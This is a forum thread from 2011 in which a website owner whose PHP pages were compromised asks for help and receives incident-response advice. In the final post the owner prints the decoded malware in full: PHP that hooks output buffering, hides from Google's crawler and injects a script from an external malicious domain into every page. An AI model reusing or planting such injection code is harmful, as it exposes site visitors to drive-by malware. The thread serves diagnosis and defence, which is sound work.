mac_gabe Posted October 12, 2011 Share Posted October 12, 2011 On the first line of nearly all the php pages on my site the following has been inserted: <?php /**/ eval(base64_decode(".................="));?> dots replace actual code - it's about 3000 characters long and when I go to the site I get redirected (sometimes) to some bogus site - the last one was adobeupdatemanager.org - and a warning in Firefox / Google "to get out of here". This is a disaster! Is it a hack? How could it have happened? What should my first course of action be? What is the long term remedy? Can I post the code which I have omitted? I think it must be hex or something. I don't want to post the address of my site here. Thanks for any help Quote Link to comment https://forums.phpfreaks.com/topic/248982-has-my-site-been-hacked/ Share on other sites More sharing options...
Pikachu2000 Posted October 12, 2011 Share Posted October 12, 2011 Yes, it probably is a hack, either through direct access via ftp, or sql injection, or security exploits on a shared server. First thing would be to take the site down and start going through your Apache and DB server logs to see if anything stands out. Quote Link to comment https://forums.phpfreaks.com/topic/248982-has-my-site-been-hacked/#findComment-1278652 Share on other sites More sharing options...
mac_gabe Posted October 12, 2011 Author Share Posted October 12, 2011 Thanks. I guess the easiest way to take the site down is through .htaccess. Do you know of code on the topmost level directory htaccess that will work site-wide to redirect all traffic to a maintenance page? This has never happened to me before. Quote Link to comment https://forums.phpfreaks.com/topic/248982-has-my-site-been-hacked/#findComment-1278662 Share on other sites More sharing options...
Pikachu2000 Posted October 12, 2011 Share Posted October 12, 2011 I haven't tried this one, but it looks like it should be as close to plug-n-play as you're gonna find . . . http://perishablepress.com/press/2010/05/19/htaccess-redirect-maintenance-page-site-updates/ Quote Link to comment https://forums.phpfreaks.com/topic/248982-has-my-site-been-hacked/#findComment-1278670 Share on other sites More sharing options...
mac_gabe Posted October 12, 2011 Author Share Posted October 12, 2011 will try thanks Quote Link to comment https://forums.phpfreaks.com/topic/248982-has-my-site-been-hacked/#findComment-1278681 Share on other sites More sharing options...
thehippy Posted October 12, 2011 Share Posted October 12, 2011 At this point you need to figure out if that script was the only thing compromised. If you don't run your webserver you need to contact your hosting provider as well. Use the phone this is not an email type situation. You'll need to know if your account security was compromised. If your billing information was taken, you'll possibly need to contact your credit card company and/or your bank and so forth. Some insurance companies have identity theft coverage, talk to them about it. Your provider could possibly have additional information and may want to take steps to bump up security, check for other intrusions and possibly report the incident to the authorities. Make sure your provider tells you what they're doing about the situation, never accept the "we've handled it" line or if they tell you some such thing it may be time to switch providers. If you have customer information stored on your webserver, you need to figure out if it was taken, if so you may need to (by law in some place) notify your customers. Responsible security practices would have the site down until its fixed, then notify your customers when you know the extent of the data breach. eval is one of those things I tend to disable with the suhosin patch. base64_decode shows that the payload is encoded in base64, so its not hex. You could switch the eval to echo to see what the payload actually is. But please do so in a secure environment, a non-networked virtual machine is handy for this kind of analysis. Until you know the extent of the intrusion you need to go into tinfoil hat mode. You can start with running checks on your personal computer and afterwards password changes need to happen as well, with anything related to that account, billing login, ftp, mysql, panel, web services that your site may use, contact email account. Quote Link to comment https://forums.phpfreaks.com/topic/248982-has-my-site-been-hacked/#findComment-1278741 Share on other sites More sharing options...
mac_gabe Posted October 12, 2011 Author Share Posted October 12, 2011 Thanks for those pieces of advice. The htaccess worked fine and immediately, so now the site is down pointing to a maintenance message, which is at least a first step. Fortunately I have next to no mysql (maybe some old databases, but not used) and no customer or login information or other sensitive info on the site - precisely because I felt I would not be able to guarantee safety, with my pretty weak coding experience. So its really a matter of removing the bad code, which should be easy, then checking there are no more nasties, which will be fairly time consuming since it's a big site. Then finding the breach - my first guess is the php I've been writing over the summer left an obvious exploit! But as you say if it's via FTP/password that's a much bigger problem as it'll imply a breach of my home computer or laptop where the password is stored, so I'd have to change all pws. My password is very long and complex so it can't have been guessed. I'll check with the host though too, just in case they've been exploited (would they tell me?). But if all those come up clean then it seems most likely my PHP has left an opening. I can see the date all the files have been changed (less than a week ago) so I will try to check FTP logs for around that date. I'm wondering now if it's someone sitting at a computer somewhere that has specifically targeted my site, or whether it's more likely to be a bot that automatically detects and exploits unsafe code. Not sure which would be worse. Quote Link to comment https://forums.phpfreaks.com/topic/248982-has-my-site-been-hacked/#findComment-1278767 Share on other sites More sharing options...
Philip Posted October 12, 2011 Share Posted October 12, 2011 a bot that automatically detects and exploits unsafe code Bingo. We see quite a few of these kinds of 'hacked sites' that follow the same pattern, so it's unlikely you were targeted specifically (unless you think you have reason you would be.) Find all instances of the base64_decode as a start, then take a look at the way you're handling any user inputs (especially things like file uploads.) Also as mentioned above, change your passwords, etc. Quote Link to comment https://forums.phpfreaks.com/topic/248982-has-my-site-been-hacked/#findComment-1278770 Share on other sites More sharing options...
mac_gabe Posted October 12, 2011 Author Share Posted October 12, 2011 Thanks - I don't see any reason to be targeted specifically, but then after any attack (I guess it would be the same with a burglary) you can't help but wonder. To be honest you'd have to have a lot of free time on your hands to bother to bring down my site. I think the bot idea is more of a relief somehow, but it's going to be difficult to change all the code I've written. There is no uploading on the site, so that can't be it, but I do have a script that writes stuff on another page. Later on I'll post examples of my scripts to see if anyone can see a loophole. I also did wonder about a guy who asked to advertise on the site. I inserted his code for a fee on one page - it looked legit, but he gave no contact details or anything. That was a month or two before this. For reference, the actual exploit code is very similar to these two examples: http://forums.oscommerce.com/topic/336693-i-have-been-hacked-help-please/ http://drupal.org/node/504010 (not sure what the rule for linking to these sorts of posts is, apologies if it's not allowed) it's a long line of base 64, which I think first redirects google requests to a particular website, and then seems to unpack a whole bunch of stuff using gzdecode. I can't follow it after that. It looks really nasty. I've contacted the host and they said it wasn't a breach on their part and they would look at the FTP logs. Quote Link to comment https://forums.phpfreaks.com/topic/248982-has-my-site-been-hacked/#findComment-1278778 Share on other sites More sharing options...
Philip Posted October 12, 2011 Share Posted October 12, 2011 Just out of curosity, can you post the base64_decoded string here within tags?. You can use an online tool or create a quick script to decode the string. Of course, take out any private information for your site Quote Link to comment https://forums.phpfreaks.com/topic/248982-has-my-site-been-hacked/#findComment-1278782 Share on other sites More sharing options...
mac_gabe Posted October 12, 2011 Author Share Posted October 12, 2011 Sure this is it: if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; if(!function_exists('mrobh')){ if(!function_exists('gml')){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],"google")){ return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9zd2VlcHN0YWtlc2FuZGNvbnRlc3RzaW5mby5jb20vanMucGhwP3M9MSI+PC9zY3JpcHQ+"); } return ""; } } if(!function_exists('gzdecode')){ function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&{ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header('Content-Encoding: none'); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start('mrobh'); } } the first bit of 64code within code points to: <script src="http://sweepstakesandcontestsinfo.com/js.php?s=1"></script> The version discussed here, which looks similar, is dissected at the bottom of the thread, and has a trojan payload: http://forums.oscommerce.com/topic/355864-base-64-infection/ Quote Link to comment https://forums.phpfreaks.com/topic/248982-has-my-site-been-hacked/#findComment-1278785 Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.